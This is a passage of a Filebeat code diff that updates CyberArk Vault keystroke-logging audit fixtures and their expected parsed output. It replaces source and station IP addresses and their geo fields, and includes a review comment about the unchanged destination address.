03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n 
Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n 
\n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke 
logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke 
logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log-expected.json index d7712ea0c0c4..b9c29d126a95 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log-expected.json 
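Review bot: The rewritten records still carry 34.123.103.115 as DstHost, inside the File name and in the Address property, while the station and SrcHost values were moved to 81.2.69.143 and 67.43.156.14; if the intent is to keep only test-range addresses in this fixture, that destination address is the one left behind. The matching expected-output hunk below drops every `destination.geo.*` field for it, which reads as the lookup database used by the tests not covering that address, so the destination enrichment path is no longer exercised by this sample. Replacing it with an address the test lookup resolves would keep the geo assertions for the destination side, and the session/offset fields around it do not depend on the value. This is an input fixture, so no parser code is affected by the choice.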
@@ -97,23 +97,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "d284c268-2ba0-4366-af52-e33459b073a1", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:49:49Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Keystroke logging", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 
14 06:49:49", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "keystroke logging", @@ -143,24 +138,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -191,23 +183,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "29f340df-89e9-405a-beae-0216390cda42", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:32:04Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Keystroke logging", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 15 03:32:04", 
"destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "keystroke logging", @@ -227,7 +214,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 6380, + "log.offset": 6374, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -237,24 +224,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -285,23 +269,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:33:47Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Keystroke logging", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n Command=sudo 